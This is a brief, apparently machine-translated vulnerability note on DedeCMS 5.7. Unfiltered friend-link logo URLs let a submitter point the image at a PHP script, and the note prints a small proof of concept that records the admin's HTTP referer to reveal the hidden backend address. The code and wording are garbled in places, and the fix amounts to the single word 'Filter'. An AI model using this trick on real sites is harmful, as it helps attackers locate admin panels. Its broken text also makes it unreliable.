The background address is leaked due to a design defect in zhimeng.

The background address is leaked due to a design defect in zhimeng.

A design defect occurs. The program does not strictly filter some items, leading to backend address leakage. It only tests 5.7. Other Visual versions also have problems.

 

DEDECMS does not strictly judge and filter the LOGO address applied for the link, resulting in submission of suffixes such as PHP and ASP.

When you view the link in the background, as shown in, the image is still the URL submitted at the time of application.


 

X. PHP code:
 

<? Phpfile_put_contents('x.txt ', $ _ SERVER ['HTTP _ referer']); header ("Content-type: image/jpeg"); $ img = imagecreatefromjpeg ("x.jpg "); imagejpeg ($ img); imagedestroy ($ img);?>

When accessing this file, get $ _ SERVER ['HTTP _ referer'] and write the file to X. TXT.
 

 

Solution:

Filter